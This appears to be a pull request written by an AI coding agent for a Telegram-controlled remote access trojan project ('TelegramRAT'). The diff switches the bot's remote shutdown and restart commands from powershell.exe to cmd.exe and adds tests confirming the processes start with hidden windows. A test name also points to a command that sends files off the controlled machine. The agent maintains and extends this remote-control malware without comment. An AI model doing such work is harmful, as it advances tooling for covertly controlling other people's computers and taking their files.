### PR TITLE
Fix power command shutdown hosts

### DIFF
--- a/Commands/CommandRegistry.cs
+++ b/Commands/CommandRegistry.cs
@@ -327,7 +327,7 @@ public static class CommandRegistry
                                 model.Message.Chat.Id,
                                 "Done!",
                                 replyParameters: new ReplyParameters { MessageId = model.Message.MessageId });
-                            StartProcess("powershell.exe", "/c shutdown /s /t 1");
+                            StartProcess("cmd.exe", "/c shutdown /s /t 1");
                             break;
 
                         case "restart":
@@ -335,7 +335,7 @@ public static class CommandRegistry
                                 model.Message.Chat.Id,
                                 "Done!",
                                 replyParameters: new ReplyParameters { MessageId = model.Message.MessageId });
-                            StartProcess("powershell.exe", "/c shutdown /r /t 1");
+                            StartProcess("cmd.exe", "/c shutdown /r /t 1");
                             break;
 
                         case "logoff":

--- a/TelegramRAT.Tests/CommandRegistryTests.cs
+++ b/TelegramRAT.Tests/CommandRegistryTests.cs
@@ -358,6 +358,86 @@ public class CommandRegistryTests
     }
 
     [Fact]
+    public async Task PowerCommand_Off_UsesShutdownPowerOff()
+    {
+        var sentMessages = new List<string>();
+        var botMock = CreateBotMock(sentMessages);
+        Program.SetBotClient(botMock.Object);
+
+        var commands = new List<BotCommand>();
+        CommandRegistry.InitializeCommands(commands);
+        var command = commands.Single(c => c.Command == "power");
+
+        var originalStarter = CommandRegistry.ProcessStarter;
+        ProcessStartInfo? capturedStartInfo = null;
+
+        try
+        {
+            CommandRegistry.ProcessStarter = info =>
+            {
+                capturedStartInfo = info;
+                return null;
+            };
+
+            var model = CreateModel("power", new[] { "off" });
+
+            await command.Execute(model);
+        }
+        finally
+        {
+            CommandRegistry.ProcessStarter = originalStarter;
+        }
+
+        Assert.Single(sentMessages);
+        Assert.Equal("Done!", sentMessages[0]);
+
+        Assert.NotNull(capturedStartInfo);
+        Assert.Equal("cmd.exe", capturedStartInfo!.FileName);
+        Assert.Equal("/c shutdown /s /t 1", capturedStartInfo.Arguments);
+        Assert.True(capturedStartInfo.CreateNoWindow);
+    }
+
+    [Fact]
+    public async Task PowerCommand_Restart_UsesShutdownRestart()
+    {
+        var sentMessages = new List<string>();
+        var botMock = CreateBotMock(sentMessages);
+        Program.SetBotClient(botMock.Object);
+
+        var commands = new List<BotCommand>();
+        CommandRegistry.InitializeCommands(commands);
+        var command = commands.Single(c => c.Command == "power");
+
+        var originalStarter = CommandRegistry.ProcessStarter;
+        ProcessStartInfo? capturedStartInfo = null;
+
+        try
+        {
+            CommandRegistry.ProcessStarter = info =>
+            {
+                capturedStartInfo = info;
+                return null;
+            };
+
+            var model = CreateModel("power", new[] { "restart" });
+
+            await command.Execute(model);
+        }
+        finally
+        {
+            CommandRegistry.ProcessStarter = originalStarter;
+        }
+
+        Assert.Single(sentMessages);
+        Assert.Equal("Done!", sentMessages[0]);
+
+        Assert.NotNull(capturedStartInfo);
+        Assert.Equal("cmd.exe", capturedStartInfo!.FileName);
+        Assert.Equal("/c shutdown /r /t 1", capturedStartInfo.Arguments);
+        Assert.True(capturedStartInfo.CreateNoWindow);
+    }
+
+    [Fact]
     public async Task DownloadCommand_WithRelativePath_SendsFileFromCurrentDirectory()
     {
         var sentMessages = new List<string>();


### PR DESCRIPTION
## Summary
- update the power command to run shutdown off and restart operations via cmd.exe
- extend the command registry tests to verify the shutdown host and arguments for off and restart

## Testing
- dotnet test *(fails: command not found)*

------
https://chatgpt.com/codex/tasks/task_e_68f7a55fc96c832b94884a5e6d01fcbe